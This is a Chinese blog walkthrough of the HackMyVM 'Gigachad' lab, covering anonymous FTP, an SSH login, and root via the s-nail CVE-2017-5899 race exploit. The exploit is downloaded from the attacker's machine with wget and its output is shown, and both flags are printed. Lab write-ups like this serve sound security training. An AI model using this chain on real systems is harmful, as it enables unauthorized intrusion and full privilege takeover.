HackMyVM Gigachad.

原创已于 2025-04-16 20:18:26 修改 · 328 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#vr

于 2025-04-16 20:17:39 首次发布

Gigachad

信息搜集

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:42 EDT
Nmap scan report for 192.168.214.85
Host is up (0.00011s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.214.85 -p 21 -sC
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 07:43 EDT
Nmap scan report for bogon (192.168.214.85)
Host is up (0.00024s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.214.76
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:73:76:3D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds

靶机IP:192.168.214.85

FTP存在匿名登陆

┌──(root㉿kali)-[/home/kali]
└─# lftp 192.168.214.85 -u anonymous
Password:
lftp anonymous@192.168.214.85:~> ls -al
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 .
dr-xr-xr-x    2 1000     1000         4096 Feb 07  2021 ..
-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
lftp anonymous@192.168.214.85:/> get chadinfo
297 bytes transferred
lftp anonymous@192.168.214.85:/> exit

file一下得知是一个压缩包文件

┌──(root㉿kali)-[/home/kali]
└─# file chadinfo
chadinfo: Zip archive data, at least v1.0 to extract, compression method=store

直接读取一下

┌──(root㉿kali)-[/home/kali]
└─# cat chadinfo
PK
0
 HR��␦ƃchadinfoUT       �j `Zj `ux
                                  why yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0
 HR��␦ƃ��chadinfoUT�j `ux
                         PKN�

一个用户名chad，还有一个png路径，接着前往web页面查看内容

把文件保存到本地，原本以为是图片隐写，尝试后发现不对，放到谷歌识图上，得知是图寻题，塔名为少女塔

用维基百科查询得到了英文名maidenstower

因为一开始扫描靶机ip时发现了有ssh服务，接着用ssh进行连接

SSH连接靶机

userflag

chad@gigachad:~$ ls -al
total 20
drwxr-xr-x 4 chad chad 4096 Apr 16 06:58 .
drwxr-xr-x 3 root root 4096 Feb  7  2021 ..
dr-xr-xr-x 2 chad chad 4096 Feb  7  2021 ftp
drwx------ 3 chad chad 4096 Apr 16 06:58 .gnupg
-r-x------ 1 chad chad   32 Feb  7  2021 user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56Achad@gigachad:~$

提权

chad@gigachad:~$ find / -user root -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/s-nail/s-nail-privsep
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh

发现了一个s-nail(CVE-2017-5899)，用exploit进行搜索，得到了下面的内容

接着用kali将脚本保存下来，并开启kali的http服务

┌──(root㉿kali)-[/home/kali/bash]
└─# searchsploit -m 47172
  Exploit: S-nail < 14.8.16 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/47172
     Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
    Codes: CVE-2017-5899
 Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/bash/47172.sh'? y
Copied to: /home/kali/bash/47172.sh

┌──(root㉿kali)-[/home/kali/bash]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.214.85 - - [16/Apr/2025 08:03:47] "GET /47172.sh HTTP/1.1" 200 -

靶机用wget获取kali中下载的47172.sh脚本

chad@gigachad:~$ wget 192.168.214.76/47172.sh
--2025-04-16 07:09:33--  http://192.168.214.76/47172.sh
Connecting to 192.168.214.76:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8479 (8.3K) [text/x-sh]
Saving to: ‘47172.sh.1’

47172.sh.1                100%[===================================>]   8.28K  --.-KB/s    in 0s

2025-04-16 07:09:33 (232 MB/s) - ‘47172.sh.1’ saved [8479/8479]

因为是个条件竞争的脚本，存在一定的运气，运气好的运行脚本的次数就少，运气不好的，次数就多

rootflag

  It cannot be run by itself.
[.] Race #863 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 14424 Apr 16 07:12 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# bash
root@gigachad:~# cd /root
root@gigachad:/root# ls
chad_real_identity.png  root.txt
root@gigachad:/root# cat root.txt
832B123648707C6CD022DD9009AEF2FDroot@gigachad:/root#